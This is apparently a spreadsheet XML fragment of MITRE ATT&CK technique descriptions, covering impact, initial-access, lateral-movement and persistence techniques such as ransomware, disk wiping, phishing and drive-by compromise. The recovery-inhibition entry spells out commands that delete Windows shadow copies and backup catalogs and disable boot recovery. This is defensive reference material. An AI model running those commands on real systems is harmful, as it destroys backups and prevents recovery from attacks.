    <t xml:space="preserve">Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.
In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). </t>
  </si>
  <si>
    <t>Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform Network DoS attacks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For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform DoS attacks against endpoint resources,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Botnets are commonly used to conduct DDoS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DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)
For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
</t>
  </si>
  <si>
    <t>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as &lt;code&gt;del&lt;/code&gt; and &lt;code&gt;rm&lt;/code&gt; often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional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2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</t>
  </si>
  <si>
    <t>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) 
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.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</si>
  <si>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Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. 
</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. &lt;code&gt;reload&lt;/code&gt;).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;Set-LocalUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountPassword&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the &lt;code&gt;passwd&lt;/code&gt; utility may be used to change passwords. Accounts could also be disabled by Group Policy. 
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. </t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)</t>
  </si>
  <si>
    <t>Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks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
On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;
* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;
* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;
* &lt;code&gt;REAgentC.exe&lt;/code&gt; can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)</t>
  </si>
  <si>
    <t>Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) 
Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)
Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)
Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)</t>
  </si>
  <si>
    <t>Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.
Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to gain access to victim systems.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malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) 
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)</t>
  </si>
  <si>
    <t>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. 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Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.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credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
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Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) 
Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)</t>
  </si>
  <si>
    <t>Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments.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Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)
In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)</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</si>
  <si>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
Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. 
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)</t>
  </si>
  <si>
    <t>Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. 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
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046)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services.(Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.
Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)
Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. 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A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001).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(Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.</t>
  </si>
  <si>
    <t>Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.
Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.</t>
  </si>
  <si>
